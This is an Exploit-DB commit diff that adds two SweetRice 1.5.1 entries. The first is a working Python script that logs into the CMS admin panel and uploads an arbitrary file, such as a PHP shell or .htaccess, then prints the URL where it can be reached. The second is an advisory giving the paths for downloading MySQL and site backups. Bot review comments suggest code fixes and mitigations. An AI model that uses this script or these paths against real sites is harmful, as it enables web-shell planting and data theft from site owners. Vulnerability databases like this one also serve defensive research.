DB: 2016-11-07
2 new exploits SweetRice 1.5.1 - Arbitrary File Upload SweetRice 1.5.1 - Backup Disclosure
parent
c65daa1397
commit
1ee96838d2
3 changed files with 89 additions and 0 deletions
|
@ -30774,6 +30774,7 @@ id,file,description,date,author,platform,type,port
|
|||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
|
||||
40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
|
||||
34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
|
||||
|
@ -30803,6 +30804,7 @@ id,file,description,date,author,platform,type,port
|
|||
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
|
||||
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
|
||||
34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
|
||||
40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
|
||||
34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
|
||||
34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
|
||||
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
|
||||
|
|
|
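--- a/platforms/php/webapps/40716.py
+++ b/platforms/php/webapps/40716.py
@@ -0,0 +1,68 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+import requests
+import os
+from requests import session
+
+if os.name == 'nt':
+os.system('cls')
+else:
+os.system('clear')
+pass
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+| _________ __ __________.__ |
+| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
+| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
+| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
+|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
+| \/ \/ \/ \/ \/ \/ |
+| > SweetRice 1.5.1 Unrestricted File Upload |
+| > Script Cod3r : Ehsan Hosseini |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+print(banner)
+
+
+# Get Host & User & Pass & filename
+host = input("Enter The Target URL(Example : localhost.com) : ")
+username = input("Enter Username : ")
+password = input("Enter Password : ")
+filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
+file = {'upload[]': open(filename, 'rb')}
+
+payload = {
+'user':username,
+'passwd':password,
+'rememberMe':''
+}
+
+
+
+with session() as r:
+login = r.post('http://' + host + '/as/?type=signin', data=payload)
+success = 'Login success'
+if login.status_code == 200:
+print("[+] Sending User&Pass...")
+if login.text.find(success) > 1:
+print("[+] Login Succssfully...")
+else:
+print("[-] User or Pass is incorrent...")
+print("Good Bye...")
+exit()
+pass
+pass
+uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
+if uploadfile.status_code == 200:
+print("[+] File Uploaded...")
+print("[+] URL : http://" + host + "/attachment/" + filename)
+pass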
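Review bot: The first line `#/usr/bin/python` is missing the `!`, so this file (committed as executable) has no interpreter line, and the `input()` calls would evaluate whatever is typed as a Python expression if the script ends up being run by Python 2; `#!/usr/bin/env python3` would pin the interpreter that the `print()`/`input()` usage appears to assume. The header also does not say that the upload happens only after a successful `/as/?type=signin` login, which matters when triaging severity; a line such as `# Requires: valid credentials for the /as/ login (post-authentication)` would record that. Both requests are built with a hard-coded `http://` prefix, so the credentials cross the network in clear text, and the handle from `open(filename, 'rb')` is never closed. For defenders the relevant takeaway is that files posted to `media_center` become reachable under `/attachment/`, so that directory should not be allowed to execute scripts or honour an uploaded `.htaccess`.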
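--- a/platforms/php/webapps/40718.txt
+++ b/platforms/php/webapps/40718.txt
@@ -0,0 +1,19 @@
+Title: SweetRice 1.5.1 - Backup Disclosure
+Application: SweetRice
+Versions Affected: 1.5.1
+Vendor URL: http://www.basic-cms.org/
+Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+Discovered by: Ashiyane Digital Security Team
+Tested on: Windows 10
+Bugs: Backup Disclosure
+Date: 16-Sept-2016
+
+
+Proof of Concept :
+
+You can access to all mysql backup and download them from this directory.
+http://localhost/inc/mysql_backup
+
+and can access to website files backup from:
+http://localhost/SweetRice-transfer.zip
+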
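Review bot: The advisory gives the two locations but no remediation or detection guidance, and it does not state whether the requests need an authenticated session. I would add a closing section, for example `Mitigation: deny web access to inc/mysql_backup/ and delete SweetRice-transfer.zip from the web root once the transfer is done.` and `Detection: review access logs for requests to these two paths.` The `Date: 16-Sept-2016` field also differs from the 2016-11-06 date recorded for this entry in the index, so it is worth saying which is the discovery date and which the publication date.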